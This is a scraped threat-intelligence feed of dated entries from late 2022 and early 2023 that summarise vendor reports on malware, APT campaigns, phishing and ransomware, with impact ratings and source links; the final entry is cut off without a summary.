Source: https://www.cybereason.com/blog/threat-analysis-from-icedid-to-domain-compromise

Intel Source:: Rewterz

Intel Name:: Active_IOCs_of_Mirai_Botnet_aka_Katana

Date of Scan:: 2023-01-12

Impact:: LOW

Summary:: Researchers from Rewterz have identified the active IOCs of Mirai Botnet aka Katana. Mirai is one of the first major botnets to target Linux-based vulnerable networking devices. It was discovered in August 2016 and its name means “future” in Japanese.

Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-mirai-botnet-aka-katana-active-iocs-4

Intel Source:: CrowdStrike

Intel Name:: Hackers_From_Scattered_Spider_Using_Old_Intel_Driver_to_Bypass_Security

Date of Scan:: 2023-01-12

Impact:: MEDIUM

Summary:: CrowdStrick researchers have identified a financially motivated threat actor named Scattered Spider and observed attempting to deploy Intel Ethernet diagnostics drivers in a BYOVD (Bring Your Own Vulnerable Driver) attack to evade detection from EDR (Endpoint Detection and Response) security products.

Source: https://www.crowdstrike.com/blog/scattered-spider-attempts-to-avoid-detection-with-bring-your-own-vulnerable-driver-tactic/

Intel Source:: Group-IB

Intel Name:: Dark_Pink_APT_Group_Targeting_Asia_Pacific_Region

Date of Scan:: 2023-01-12

Impact:: MEDIUM

Summary:: Group-IB researchers have identified a new wave of attacks that have struck the Asia-Pacific (APAC) region by the Dark Pink APT group.

Source: https://blog.group-ib.com/dark-pink-apt

Intel Source:: Fortinet

Intel Name:: Ransomware_variants_across_the_OSINT_community

Date of Scan:: 2023-01-12

Impact:: MEDIUM

Summary:: FortiGuard Labs monitors and gathers data on ransomware variants weekly that have been catching on in their datasets and across the OSINT community. They shared their ransomware report provides the insights into the ransomware landscape and the Fortinet solutions that protect against those variants.

Source: https://www.fortinet.com/blog/threat-research/ransomware-roundup-monti-blackhunt-and-more

Intel Source:: Bitdefender

Intel Name:: A_Deep_Dive_into_EyeSpy_Spyware

Date of Scan:: 2023-01-12

Impact:: LOW

Summary:: Researchers from Bitdefender have analyzed spyware named EyeSpy which is marketed as a legitimate monitoring application that arrives on the system via Trojanized installers and it is targeting t Iranian users trying to download VPN solutions to bypass Internet restrictions in their country.

Source: https://www.bitdefender.com/files/News/CaseStudies/study/427/Bitdefender-PR-Whitepaper-EyeSpyVPN-creat625-en-EN.pdf

Intel Source:: Rewterz

Intel Name:: Active_IOCs_of_DanaBot_Trojan

Date of Scan:: 2023-01-12

Impact:: LOW

Summary:: Researchers from Rewterz have identified the active IOCs of DanaBot Trojan. DanaBot is a persistent and ever-evolving threat that has been circulating in the wild since 2018 and it was originally marketed as a Malware-as-a-Service (MaaS) offering primarily targeted banking fraud and data theft.

Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-danabot-trojan-active-iocs-45

Intel Source:: TrendMicro

Intel Name:: Gootkit_Loader_Campaign_Targeting_Australian_Healthcare_Industry

Date of Scan:: 2023-01-12

Impact:: MEDIUM

Summary:: Researchers from TrendMicro have analyzed a series of attacks and discovered that Gootkit leveraging SEO poisoning for its initial access and abusing legitimate tools like VLC Media Player.

Source: https://www.trendmicro.com/en_us/research/23/a/gootkit-loader-actively-targets-the-australian-healthcare-indust.html

Intel Source:: ASEC

Intel Name:: ASEC_Weekly_Phishing_Email_sample_analyses_Dec_24_31_2022

Date of Scan:: 2023-01-12

Impact:: LOW

Summary:: The ASEC analysis team keep monitoring phishing email threats with their system and honeypot. This article explains the distribution of phishing emails during the week from December 24th, 2022 to December 31st, 2022 and provide statistical information on each type.

Source: https://asec.ahnlab.com/en/45442/

Intel Source:: ASEC

Intel Name:: ASEC_Weekly_Phishing_Email_sample_analyses

Date of Scan:: 2023-01-12

Impact:: LOW

Summary:: The ASEC analysis team keep monitoring phishing email threats with their system and honeypot. This article explains the distribution of phishing emails during the week from December 18th, 2022 to December 24th, 2022 and provide statistical information on each type.

Source: https://asec.ahnlab.com/en/45237/

Intel Source:: SentinelOne

Intel Name:: NoName057_16_Hacking_Group_Targeting_NATO

Date of Scan:: 2023-01-12

Impact:: MEDIUM

Summary:: Researchers from SentinelOne have observed that the Pro-Russian hacking group named NoName057(16) targeting Czech presidential election candidates' websites.

Source: https://www.sentinelone.com/labs/noname05716-the-pro-russian-hacktivist-group-targeting-nato/

Intel Source:: Intrinsec

Intel Name:: Emotet_Malware_resurfaces_deploying_loaders_through_Spear_Phishing

Date of Scan:: 2023-01-11

Impact:: MEDIUM

Summary:: Researchers from Intrinsic uncovered Emotet's latest Spam campaign spreading malicious documents in the wild, in addition to targeted spear-phishing emails. The malware returns with new obfuscation techniques and revamped loader capabilities.

Source: https://www.intrinsec.com/emotet-returns-and-deploys-loaders/

Intel Source:: Malwarebytes

Intel Name:: Magecart_Skimmer_Using_MRSNIFFA_Toolkit

Date of Scan:: 2023-01-11

Impact:: LOW

Summary:: Malwarebytes Labs researchers have identified a Magecart skimmer using the mr.SNIFFA toolkit and infrastructure from DDoS-Guard. The domain names used to serve the skimmer referenced public figures or names well-known in the cryptocurrency world.

Source: https://www.malwarebytes.com/blog/threat-intelligence/2023/01/crypto-inspired-magecart-skimmer-surfaces-via-digital-crime-haven

Intel Source:: Phylum

Intel Name:: A_Novel_Info_Stealer_RAT_leveraging_PYPI

Date of Scan:: 2023-01-11

Impact:: LOW

Summary:: Phylum researchers have identified a novel malware campaign targeting the Python Package Index (PyPI), a combination of RAT and Stealer, to exfiltrate various data while being persistent and opening tunnels. The RAT being spread has Web GUI projecting the continuous focus on supply chain attacks.

Source: https://blog.phylum.io/a-deep-dive-into-powerat-a-newly-discovered-stealer/rat-combo-polluting-pypi

Intel Source:: TrendMicro

Intel Name:: Dridex_Malware_Returns_and_Targeting_MacOS

Date of Scan:: 2023-01-11

Impact:: LOW

Summary:: TrendMicro researchers have analyzed Dridex, an online banking malware variant targeting MacOS platforms with a new technique to deliver documents embedded with malicious macros to users.

Source: https://www.trendmicro.com/en_us/research/23/a/-dridex-targets-macos-using-new-entry-method.html https://www.trendmicro.com/content/dam/trendmicro/global/en/research/23/-dridex-returns -targets-macos-using-new-entry-method/iocs-dridex-returns-targets-macos-using-new-entry-method.txt

Intel Source:: Mandient

Intel Name:: Russian_Turla_Cyberspies_via_USB_Delivered_Malware

Date of Scan:: 2023-01-10

Impact:: LOW

Summary:: Recently Russian state-sponsored threat actor Turla lunched attackes against Ukraine and it was leveraged by Andromeda malware most likely deployed by other hackers via an infected USB drive, Mandiant reported. Mandiant researchers analyzed a Turla-suspected operation tUNC4210 and discovered that at least three expired Andromeda command and control (C&C) domains have been reregistered and used for victim profiling.

Source: https://www.mandiant.com/resources/blog/turla-galaxy-opportunity

Intel Source:: ISC.SANS

Intel Name:: DShield_Sensor_JSON_Log_Analysis

Date of Scan:: 2023-01-10

Impact:: LOW

Summary:: Researchers from SANS have analyzed json DShield logs for a 9-day period.

Source: https://isc.sans.edu/diary/rss/29412

Intel Source:: Resecurity

Intel Name:: Drug_trafficking_and_illegal_pharmacies_compete_on_the_dark_web

Date of Scan:: 2023-01-10

Impact:: MEDIUM

Summary:: Researchers from Resecurity have identified that the top 10 marketplaces are currently representing the core ecosystem of drug trafficking in the Dark Web, which is split between actors from multiple regions and influence groups.

Source: https://resecurity.com/blog/article/dark-web-markets-compete-drug-trafficking-illegal-pharmacy-monopoly

Intel Source:: DFIR Report

Intel Name:: The_Details_Exianition_of_Ursnif_Malware

Date of Scan:: 2023-01-10

Impact:: LOW

Summary:: Researchers from DFIR have analyzed the Ursnif malware. It delivers malicious ISO to users.

Source: https://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/

Intel Source:: Cyble

Intel Name:: LummaC2_Stealer_Targeting_Chromium_and_Mozilla_Based_Browsers

Date of Scan:: 2023-01-10

Impact:: LOW

Summary:: Cyble researchers have discovered a post on the cybercrime forum about an information stealer named LummaC2 Stealer targeting both Chromium and Mozilla-based browsers.

Source: https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/

Intel Source:: Symantec

Intel Name:: Bluebottle_Campaign_Hits_Banks_With_Signed_Malware

Date of Scan:: 2023-01-10

Impact:: LOW

Summary:: Researchers from Symantec have identified Bluebottle campaign hits banks in French speaking countries in Africa with the activity that leverages new TTPs.

Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa

Intel Source:: 360Netlab

Intel Name:: The_modified_CIA_attack_kit_Hive_enters_the_field_of_black_and_gray_production

Date of Scan:: 2023-01-10

Impact:: LOW

Summary:: 360Netlab researchers have observed that xdr33 is a backdoor and born out of the CIA Hive project. The main purpose is to collect sensitive information and provide a foothold for subsequent intrusions.

Source: https://blog.netlab.360.com/warning-hive-variant-xdr33-is-coming_cn/

Intel Source:: Uptycs

Intel Name:: InfoStealer_Targeting_Italian_Region

Date of Scan:: 2023-01-10

Impact:: LOW

Summary:: Researchers from Uptycs have observed a new infostealer malware attack campaign. In that the threat actors delivered emails through spam or phishing mail with the subject as “Invoice”, targeting the specific geo of Italy.

Source: https://www.uptycs.com/blog/infostealer-malware-attacks-targeting-italian-region/

Intel Source:: Rewterz

Intel Name:: Active_IOCs_of_Agent_Tesla_Malware

Date of Scan:: 2023-01-10

Impact:: MEDIUM

Summary:: Researchers from Rewterz have identified the active IOCs of Agent Tesla Malware. Agent Tesla is a very popular spyware Trojan built for the.NET framework. Agent Tesla grabs data from the victim’s clipboard, logs keystrokes, captures screenshots, and gains access to the victim’s webcam. It has the ability to terminate running analytic programs and anti-virus applications.

Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-agent-tesla-malware-active-iocs-81

Intel Source:: Cyble

Intel Name:: Hackers_Targeting_Zoom_Appliation

Date of Scan:: 2023-01-09

Impact:: MEDIUM

Summary:: Cyble researchers have identified a phishing campaign targeting Zoom application software to deliver the IcedID malware. This malware primarily targeting businesses and can be used to steal payment information.

Source: https://blog.cyble.com/2023/01/05/zoom-users-at-risk-in-latest-malware-campaign/

Intel Source:: Aqua Blog

Intel Name:: Diving_Deep_into_PyTorch_Dependency_Confusion_Administered_Malware

Date of Scan:: 2023-01-09

Impact:: LOW

Summary:: Aquasec researchers have identified the dependency of the widely used PyTorch-nightly Python package targeting in a dependency confusion attack, resulting in thousands of individuals downloading a malicious binary that exfiltrated data through DNS.

Source: https://blog.aquasec.com/pytorch-dependency-confusion-administered-malware

Intel Source:: ISC.SANS

Intel Name:: Brazil_Malspam_Pushing_Astaroth

Date of Scan:: 2023-01-09

Impact:: LOW

Summary:: Researchers from SANS have identified four Portuguese language emails targeting Brazil. These messages are pushing the same type of Astaroth (Guildma) malware.

Source: https://isc.sans.edu/diary/rss/29404

Intel Source:: Checkpoint

Intel Name:: Blindeagle_Targeting_Ecuador_Based_Organizations

Date of Scan:: 2023-01-06

Impact:: LOW

Summary:: Researchers from Checkpoint have identified a campaign that is targeting Ecuador based organizations, CPR detected a new infection chain that involves a more advanced toolset.

Source: https://research.checkpoint.com/2023/blindeagle-targeting-ecuador-with-sharpened-tools/

Intel Source:: Rewterz

Intel Name:: Active_IOCs_of_Amadey_Botnet

Date of Scan:: 2023-01-06

Impact:: MEDIUM

Summary:: Researchers from Rewterz have identified the active IOCs of Amadey Botnet. Amadey infects a victim’s computer and incorporates it into a. botnet. The Amadey trojan can also download additional malware. and exfiltrate user information to a command and control (C2) server.

Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-amadey-botnet-active-iocs-21

Intel Source:: Rewterz

Intel Name:: PatchWork_APT_Group_Targeting_Pakistan

Date of Scan:: 2023-01-06

Impact:: MEDIUM

Summary:: Researchers from Rewterz have identified the active IOCs of PatchWork APT Group. This Indian threat actor Patchwork has been active since December 2015 and recently using spear phishing to strike Pakistan. PatchWork, (also known as Mahabusa, White Elephant, hangOver, VICEROY TIGER, The Dropping Elephant) is an APT that mainly conducts cyber-espionage activities against its targets.

Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-patchwork-apt-group-targeting-pakistan-active-iocs-4

Intel Source:: Rewterz

Intel Name:: Active_IOCs_of_DarkCrystal_RAT_(DCRat)

Date of Scan:: 2023-01-05

Impact:: LOW

Summary:: Researchers from Rewterz have identified the active IOCs of DarkCrystal RAT. DCRat is a Russian backdoor, was initially introduced in 2018. The malware’s modular architecture allows it to be extended for a variety of nefarious objectives, including surveillance, reconnaissance, data theft, DDoS attacks, and arbitrary code execution.

Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-darkcrystal-rat-dcrat-active-iocs-21

Intel Source:: Rewterz

Intel Name:: Active_IOCs_of_SmokeLoader_Malware

Date of Scan:: 2023-01-05

Impact:: LOW

Summary:: Researchers from Rewterz have identified the active IOCs of SmokeLoader Malware. This malware is mostly used to load additional malicious software, which is often obtained from a third-party source. Smoke Loader can load its modules allowing it to do several activities without the use of additional components

Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-smokeloader-malware-active-iocs-55

Intel Source:: Rewterz

Intel Name:: Active_IOCs_of_Ursnif_Banking_Trojan

Date of Scan:: 2023-01-05

Impact:: LOW

Summary:: Researchers from Rewterz have identified the active IOCs of Ursnif Banking Trojan. The attackers have switched to using Trojans such as Ursnif to steal other types of data, including email configurations, as well as credentials and passwords stored in the web browsers and even digital wallets. Threat actors use different techniques to make a victim fall into their trap like a phishing email.

Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-ursnif-banking-trojan-active-iocs-43

Intel Source:: Rewterz

Intel Name:: Active_IOCs_of_CrySIS_aka_Dharma_Ransomware

Date of Scan:: 2023-01-05

Impact:: MEDIUM

Summary:: Researchers from Rewterz have identified the active IOCs of CrySIS aka Dharma Ransomware. CrySIS, also known as Dharma, is a group of ransomware that has been active since 2016. Researchers indicate the spam emails attempt to disguise themselves as invoice emails. In reality, the spam is being used to infect users with the Ursnif keylogger or the Dharma ransomware.

Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-crysis-aka-dharma-ransomware-active-iocs-2

Intel Source:: Rewterz

Intel Name:: Active_IOCs_of_DarkCrystal_Agent_Tesla_Malware

Date of Scan:: 2023-01-05

Impact:: MEDIUM

Summary:: Researchers from Rewterz have identified the active IOCs of Agent Tesla Malware. Agent Tesla is a very popular spyware Trojan built for the.NET framework. Agent Tesla grabs data from the victim’s clipboard, logs keystrokes, captures screenshots, and gains access to the victim’s webcam. It has the ability to terminate running analytic programs and anti-virus applications.

Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-agent-tesla-malware-active-iocs-81

Intel Source:: ASEC

Intel Name:: Installing_CoinMiner_by_malware

Date of Scan:: 2023-01-05

Impact:: LOW

Summary:: The ASEC analysis team observed a new Linux malware developed with Shell Script Compiler that has been installing a CoinMiner. It believes that after successful verification through a dictionary attack on inadequately managed Linux SSH servers, different malwares were installed on the target system. Among those installed were the Shc downloader, XMRig CoinMiner installed through the former, and DDoS IRC Bot, developed with Perl.

Source: https://asec.ahnlab.com/en/45182/

Intel Source:: Rewterz

Intel Name:: Active_IOCs_of_Cobalt_Strike_Malware

Date of Scan:: 2023-01-04

Impact:: LOW

Summary:: Researchers from Rewterz have identified the active IOCs of Cobalt Strike Malware. Cobalt Strike lets the attacker install a ‘Beacon’ agent on the target PC which provides the attacker with a plethora of capabilities, including command execution, file transfer, keylogging, mimikatz, port scanning, and privilege escalation.

Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-cobalt-strike-malware-active-iocs-40

Intel Source:: Rewterz

Intel Name:: Active_IOCs_of_RedLine_Stealer_Ransomware

Date of Scan:: 2023-01-04

Impact:: MEDIUM

Summary:: Researchers from Rewterz have identified the active IOCs of RedLine Stealer. This malware first appeared in March 2020. Redline expanded throughout several nations during the COVID-19 epidemic and is still active today.

Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-redline-stealer-active-iocs-69

Intel Source:: Rewterz

Intel Name:: Active_IOCs_of_Qakbot_(Qbot)_Malware

Date of Scan:: 2023-01-04

Impact:: MEDIUM

Summary:: Researchers from Rewterz have identified the active IOCs of Qakbot (Qbot) Malware. This banking Trojan, QakBot steals financial data from infected systems, and a loader using C2 servers for payload targeting and download.

Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-qakbot-qbot-malware-active-iocs-52

Intel Source:: DrWeb

Intel Name:: The_infection_of_WordPress_based_websites

Date of Scan:: 2023-01-04

Impact:: LOW

Summary:: Researchers from Doctor Web found a malicious Linux program that is capable of hacking websites based on a WordPress CMS. It can exploits 30 vulnerabilities in a number of plugins and themes for this platform. It can inject with malicious JavaScripts these websites if they have outdated versions of such add-ons, lacking crucial fixes.

Source: https://news.drweb.com/show/?i=14646&lng=en&c=23

Intel Source:: Rewterz

Intel Name:: Active_IOCs_of_LockBit_Ransomware

Date of Scan:: 2023-01-04

Impact:: MEDIUM

Summary:: Researchers from Rewterz have identified the active IOCs of LockBit Ransomware. LockBit attacks leave few traces for forensic analysis as the malware loads into the system memory, with logs and supporting files removed upon execution.

Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-lockbit-ransomware-active-iocs-11

Intel Source:: Rewterz

Intel Name:: Active_IOCs_of_DarkyLock_Ransomware

Date of Scan:: 2023-01-04

Impact:: MEDIUM

Summary:: Researchers from Rewterz have identified the active IOCs of DarkyLock Ransomware. The ransomware attacks all commonly used file formats, including media, documents, databases, and archive files.

Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-darkylock-ransomware-active-iocs

Intel Source:: Security Joes

Intel Name:: The_Insurance_&_Financial_Institutes_In_Europe_are_targeted_by_Raspberry_Robin

Date of Scan:: 2023-01-04

Impact:: LOW

Summary:: Threat researchers from SecurIty Joes company observed and responded to hackers attacks twice this month that was using a framework called Raspberry Robin.

Source: https://www.securityjoes.com/post/raspberry-robin-detected-itw-targeting-insurance-financial-institutes-in-europe

Intel Source:: Guardio

Intel Name:: Hackers_Abusing_Google_AdWords

Date of Scan:: 2022-12-30

Impact:: LOW

Summary:: Researchers from Gradio have identified a new technique to abuse Google’s ad-words powerful advertisement platform is spreading rogue promoted search results in mass.

Source: https://labs.guard.io/masquerads-googles-ad-words-massively-abused-by-threat-actors-targeting-organizations-gpus-42ae73ee8a1e

Intel Source:: Recorded Future

Intel Name:: The_European_Government_Organizations_targeted_by_RedDelta_threat_group

Date of Scan:: 2022-12-30

Impact:: MEDIUM

Summary:: Reserachers from Recorded Future are tracking activity of this RedDelta team which they think is attributed to the likely Chinese state-sponsored threat activity group which is targeting organizations within Europe and Southeast Asia using a customized variant of the PlugX backdoor.

Source: https://www.recordedfuture.com/reddelta-targets-european-government-organizations-continues-iterate-custom-plugx-variant

Intel Source:: SlowMist

Intel Name:: Lazarus_Threat_Group_Using_Phishing_Domains_to_Target_NFT_Investors

Date of Scan:: 2022-12-30

Impact:: MEDIUM

Summary:: Researchers from SlowMist have identified a massive phishing campaign targeting NFT investors. It observed that the attackers set up nearly 500 decoy sites with malicious Mints.

Source: https://slowmist.medium.com/slowmist-our-in-depth-investigation-of-north-korean-apts-large-scale-phishing-attack-on-nft-users-362117600519

Intel Source:: PaloAlto

Intel Name:: The_WildFire_malware_team_monitoring_malware_techniques

Date of Scan:: 2022-12-30

Impact:: LOW

Summary:: Palo Alto researchers did deep analyses on malware authors and malware variations if they detect they were running in a sandbox. They shared and discussed a lot of sandboxing approaches out there with pros and cons to each and many of the evasion types.

Source: https://unit42.paloaltonetworks.com/sandbox-evasion-memory-detection/

Intel Source:: Wordfence

Intel Name:: Vulnerability_in_YITH_WooCommerce_Gift_Cards

Date of Scan:: 2022-12-28

Impact:: LOW

Summary:: The Wordfence Threat Intelligence team has been tracking exploits targeting a Critical Severity Arbitrary File Upload vulnerability in YITH WooCommerce Gift Cards Premium, a plugin with over 50,000 installations according to the vendor.

Source: https://www.wordfence.com/blog/2022/12/psa-yith-woocommerce-gift-cards-premium-plugin-exploited-in-the-wild/

Intel Source:: Securelist

Intel Name:: BlueNoroff_bypassing_MoTW

Date of Scan:: 2022-12-28

Impact:: LOW

Summary:: Researchers from securelist discovered new method the group adopted is aimed at evading the Mark-of-the-Web (MOTW) flag, the security measure whereby Windows displays a warning message when the user tries to open a file downloaded from the internet.

Source: https://securelist.com/bluenoroff-methods-bypass-motw/108383/

Intel Source:: Palo Alto Networks

Intel Name:: Sandbox_Evasions_Navigating_the_Vast_Ocean

Date of Scan:: 2022-12-28

Impact:: LOW

Summary:: Palo Alto Networks customers receive improved detection for the evasions through Advanced WildFire.

Source: https://unit42.paloaltonetworks.com/sandbox-evasion-memory-detection/#post-126138-_feak18cweg6f

Intel Source:: Zscaler

Intel Name:: ArkeiStealer_masquerade_as_a_trading_application

Date of Scan:: 2022-12-28

Impact:: LOW

Summary:: Researchers from ThreatLabz discovered that threat actors are now distributing ArkeiStealer through Windows Installer binaries which masquerade as a trading application. The trading application is backdoored with the SmokeLoader downloader which further downloads an information stealer.

Source: https://www.zscaler.com/blog/security-research/trade-with-caution

Intel Source:: Cyble

Intel Name:: PureLogs_Stealer_Through_Spam_Campaigns

Date of Scan:: 2022-12-28

Impact:: MEDIUM

Summary:: Cyble Research and Intelligence Labs (CRIL) came across a tweet about PureLogs information stealer by TG Soft. This tool is used by the Threat Actor (TA) “Alibaba2044” to launch a malicious spam campaign at targets based in Italy

Source: https://blog.cyble.com/2022/12/27/pure-coder-offers-multiple-malware-for-sale-in-darkweb-forums/

Intel Source:: IBM Security Intelligence

Intel Name:: The_Details_About_Shadow_IT

Date of Scan:: 2022-12-27

Impact:: MEDIUM

Summary:: IBM Security Intelligence researchers have highlighted three incidents where Shadow IT was leveraged during the attack to help organizations realize how Shadow IT can quickly transform from a threat to an incident.

Source: https://securityintelligence.com/posts/beware-lurking-shadows-it/

Intel Source:: ISC.SANS

Intel Name:: Google_Ads_Traffic_Led_to_Multiple_Malware

Date of Scan:: 2022-12-27

Impact:: MEDIUM

Summary:: Researchers from SANS have identified google ad traffic that led to a fake TeamViewer page, and that page led to a different type of malware.

Source: https://isc.sans.edu/diary/Google+ad+traffic+leads+to+stealer+packages+based+on+free+software/29376/

Intel Source:: Team Cymru

Intel Name:: The_Details_of_IcedID_BackConnect_Protocol

Date of Scan:: 2022-12-27

Impact:: LOW

Summary:: Team-Cymru researchers have continued monitoring the IcedID / BokBot activity and identified some insights derived from infrastructure associated with IcedID’s BackConnect (BC) protocol.

Source: https://www.team-cymru.com/post/inside-the-icedid-backconnect-protocol

Intel Source:: Spider Labs

Intel Name:: Diving_Deep_into_Ekipa_RAT

Date of Scan:: 2022-12-23

Impact:: LOW

Summary:: SpiderLabs researchers have analyzed samples of an Ekipa Remote Access Trojan (RAT) in the wild and found interesting techniques for the use of malicious Office documents. The Ekipa RAT was added to a sophisticated threat actors’ cyber arsenal and used in the Russian – Ukraine war.

Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/malicious-macros-adapt-to-use-microsoft-publisher-to-push-ekipa-rat/

Intel Source:: CADO Security

Intel Name:: New_Variant_of_Kiss_a_Dog_Cryptojacking_Campaign

Date of Scan:: 2022-12-23

Impact:: LOW

Summary:: Researchers from CADO security have uncovered a newer variant of Kiss-a-Dog campaign and observed leveraging at there Redis honeypot suggesting a broadening of scope from Docker and Kubernetes.

Source: https://www.cadosecurity.com/kiss-a-dog-discovered-utilizing-a-20-year-old-process-hider/

Intel Source:: Rapid7

Intel Name:: The_exploitation_of_OWASSRF_in_MS_Exchange_Server_for_RCE

Date of Scan:: 2022-12-23

Impact:: LOW

Summary:: Rapid7 researchers have observed the exploitation of OWASSRF in Microsoft exchange servers for remote code execution.

Source: https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/

Intel Source:: SentinelOne

Intel Name:: Vice_Society_Ransomware_Attackers_Adopt_Robust_Encryption_Methods

Date of Scan:: 2022-12-23

Impact:: MEDIUM

Summary:: Researchers from SentinelLabs have identified Vice Society group is adopting a new custom-branded ransomware payload in recent intrusions and it is dubbed “PolyVice”, implements a robust encryption scheme, using NTRUEncrypt and ChaCha20-Poly1305 algorithms.

Source: https://www.sentinelone.com/labs/custom-branded-ransomware-the-vice-society-group-and-the-threat-of-outsourced-development/

Intel Source:: Rewterz

Intel Name:: Ursnif_Banking_Trojan_Active_IOCs

Date of Scan:: 2022-12-23

Impact:: LOW

Summary:: Researchers from Rewterz have identified the active IOCs of Ursnif Banking Trojan. It is also known as Gozi and Dreambot has been around for more than 10 years. It gained popularity in 2015 when its source code was published on Github and since then the moderators have always tweaked some changes to make use of their arsenal according to their gains. Mainly attacking banks and other financial institutions.

Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-ursnif-banking-trojan-active-iocs-42

Intel Source:: ASEC

Intel Name:: Qakbot_Distributing_via_Virtual_Disk_Files

Date of Scan:: 2022-12-23

Impact:: LOW

Summary:: Researchers from ASEC have identified that Qakbot malware has been distributed in ISO and IMG file formats and discovered that it has recently changed its distribution to the use of VHD files.

Source: https://asec.ahnlab.com/en/44662/

Intel Source:: ASEC

Intel Name:: Nitol_DDoS_Malware_Installing_Amadey_Bot

Date of Scan:: 2022-12-23

Impact:: LOW

Summary:: ASEC researchers have discovered that a threat actor has been using Nitol DDoS Bot to install Amadey. It is a downloader that has been in circulation since 2018, and besides extorting user credentials, it can also be used for the purpose of installing additional malware.

Source: https://asec.ahnlab.com/en/44504/

Intel Source:: Fortinet

Intel Name:: Hackers_Using_Phishing_Emails_to_Target_Tax_Forms

Date of Scan:: 2022-12-23

Impact:: LOW

Summary:: Researchers from Fortinet have discovered the malicious emails and that it had been sent by the recently resurgent Emotet group. It is claiming to be from “IRS.gov,” this phishing e-mail originated from an organization’s compromised e-mail account in Pakistan. The subject and body claim that the recipient’s IRS K-1 forms are attached in a Zip archive encrypted with the password “0440”.

Source: https://www.fortinet.com/blog/threat-research/the-taxman-never-sleeps

Intel Source:: TrendMicro

Intel Name:: IcedID_Botnet_Leveraging_Google_PPC_to_Distribute_Malware

Date of Scan:: 2022-12-23

Impact:: LOW

Summary:: Researchers from TrendMicro have analyzed the latest changes in IcedID botnet from a campaign that abuses Google pay-per-click (PPC) ads to distribute IcedID via malvertising attacks.

Source: https://www.trendmicro.com/en_us/research/22/l/icedid-botnet-distributors-abuse-google-ppc-to-distribute-malware.html

Intel Source:: Securelist

Intel Name:: The_Examine_of_Albanian_Government_E_service_Attack

Date of Scan:: 2022-12-23

Impact:: LOW

Summary:: Researchers from Securelist have compared the first and second waves of ransomware and wiper malware used to target Albanian entities and detail connections with previously known ROADSWEEP ransomware and ZEROCLEARE variants.

Source: https://securelist.com/ransomware-and-wiper-signed-with-stolen-certificates/108350/

Intel Source:: Rewterz

Intel Name:: Shuckworm_APT_Group_aka_Armageddon_Active_IOCs

Date of Scan:: 2022-12-22

Impact:: MEDIUM

Summary:: Researchers from Rewterz have identified the active IOCs of Shuckworm APT Group. It is a Russia-backed advanced persistent threat (APT) that has been operating since at least 2013. The main goal of this APT is to use the malicious document to gain control of the target machine.

Source: https://www.rewterz.com/rewterz-news/rewterz-threat-advisory-shuckworm-apt-group-aka-armageddon-active-iocs

Intel Source:: Fortinet

Intel Name:: New_Supply_Chain_Attack_Using_Python_Package_Index

Date of Scan:: 2022-12-22

Impact:: MEDIUM

Summary:: Researchers from Fortinet have discovered a 0-day attack embedded in a PyPI package (Python Package Index) and it is called “aioconsol.”

Source: https://www.fortinet.com/blog/threat-research/new-supply-chain-attack-uses-python-package-index-aioconsol

Intel Source:: Rewterz

Intel Name:: AsyncRAT_Active_IOCs

Date of Scan:: 2022-12-22

Impact:: LOW

Summary:: Researchers from Rewterz have identified the active IOCs of AsyncRAT. It is an open-source tool designed for remote monitoring via encrypted connections. However, it could be utilized by threat actors as it provides keylogging, remote access, and other functionality that could damage a victim’s computer or system.

Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-asyncrat-active-iocs-4

Intel Source:: Rewterz

Intel Name:: APT_SideWinder_Group_Active_IOCs

Date of Scan:: 2022-12-22

Impact:: MEDIUM

Summary:: The Rewterz analysts team have identified the active IOCs of APT SideWinder Group which is a suspected Indian threat actor group that has been active since 2012. It has been detected targeting Pakistani government officials with a decoy file related to COVID-19 in its most recent effort.

Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-apt-sidewinder-group-targeting-pakistan-active-iocs-2

Intel Source:: Rewterz

Intel Name:: Wanna_Cryptor_aka_WannaCry_Ransomware_Active_IOCs

Date of Scan:: 2022-12-22

Impact:: HIGH

Summary:: The Rewterz analysts team did analysis summary on Wanna Cryptor aka WannaCry Ransomware and have identified the active IOCs of it. WannaCry is also called WCry or WanaCrptor ransomware malware was discovered in May 2017, it infected networks running Microsoft Windows as part of a massive cyberattack. This ransomware can encrypt all your data files and demands payment to restore the stolen information, usually in bitcoin with a ransom amount. WannaCry is one of the most dangerous malware ever used for cyberattacks.

Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-wanna-cryptor-aka-wannacry-ransomware-active-iocs-2

Intel Source:: Microsoft

Intel Name:: New_Zerobot_1_1_adds_new_exploits

Date of Scan:: 2022-12-22

Impact:: HIGH

Summary:: The new version of the malware, Zerobot 1.1, adds new exploits and distributed denial-of-service attack capabilities, expanding the malware’s reach to different types of Internet of Things (IoT) devices, according to a report released by Microsoft on Wednesday. Zerobot was first discovered by researchers in November. The malware spreads primarily through unpatched and improperly secured IoT devices, such as firewalls, routers, and cameras, according to Microsoft. Hackers constantly modify the botnet to scale and target as many of the devices as possible.

Source: https://www.microsoft.com/en-us/security/blog/2022/12/21/microsoft-research-uncovers-new-zerobot-capabilities/

Intel Source:: PaloAlto

Intel Name:: Meddler_in_the_Middle_Phishing_Attacks

Date of Scan:: 2022-12-22

Impact:: LOW

